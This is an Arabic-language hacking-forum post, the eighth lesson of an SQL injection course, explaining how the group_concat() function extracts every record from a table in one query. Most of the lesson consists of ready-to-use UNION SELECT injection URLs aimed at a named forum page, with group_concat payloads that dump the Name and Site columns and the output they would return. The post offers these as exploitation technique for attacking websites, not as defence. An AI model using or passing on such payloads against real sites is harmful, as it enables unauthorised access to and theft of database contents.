Admin Admin
عدد المساهمات : 128 نقاط : 385 تاريخ التسجيل : 05/03/2014 العمر : 30 الموقع : العراق
| موضوع: [الدرس الثامن] شرح group_concat() لإستخراج جميل السجلات الجمعة مارس 14, 2014 11:24 am | |
| SQL INJECTION , دورة SQL injection , دروة الحقن, دورة حقن sql injection , شرح استغلال ثغرات sql injection , شرح دورة الحقن , شرح sql injection , شرح group_concat ، شرح استغلال group_concat بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته درس اليوم يتكلم عن group_concat() كود: group_concat() هذا الدرس مقدم من منتديات جيوش الهكرز و ASDELY.NET بواسطة ASDELY-ScOrPiOn طيب بعطي مثال وان شاء الله تفهموا لنفرض انه عندنا موقع ومركب عليه قاعدة بيانات اسمها ASDELY.NET وداخلها يوجد جدول اسمه Aljyyosh.com وداخله عمودان الاول اسمه Site والثاني اسمه Name ويوجد داخله 3 سجلات ، كما في الصورة التاليه ولنفرض انه عندنا ثغرة sql injection على الموقع والعامود الرابع مصاب لنفرض انه هذا الموقع http://www.aljyyosh.com/vb/forumdisplay.php?f=76 طيب نطبق الثغره عليه ونستخرج السجلات منه ، يصير الرابط هيك كود: http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,Name,5,6,7,8,9,10+from+Aljyyosh.com--بعد تنفيذ هذا الامر رح تطلع لنا النتيجه فقط ASDELY-ScOrPiOn بس احنا نريد ان نستخرج جميل السجلات وليس سجل واحد! ، او نحن نريد ان نستخرج جميل السجيلات من العامودين Name و Site رح يكون الامر كالتالي كود: http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,group_concat(Name),5,6,7,8,9,10+from+Aljyyosh.com--في هذا الامر رح يستخرج لنا جميع السجلات ، بمعنى انه رح يطلع لنا ASDELY-ScOrPiOn;Black.jaguar;ASDELY-ScOrPiOn او ننفذ الامر التالي حتى يستخرج لنا جميع السجلات وكل اسم وجنبه موقعه كود: http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,group_concat(Name,0x3e,Site),5,6,7,8,9,10+from+Aljyyosh.com-- بإختصار هذه الدالة كحلقة تكرار ،...، بمعنى اسهل انو هذه الدالة تستخرجلك كل السجلات مع بعض او استخراج جميل السجيلات من اكثر من عامود! انتهى الشرح ، وأي شيء غير مفهوم انا موجود وما بقصر بالتوفيق للجميع... اخوكم ASDELY-ScOrPiOn | |
|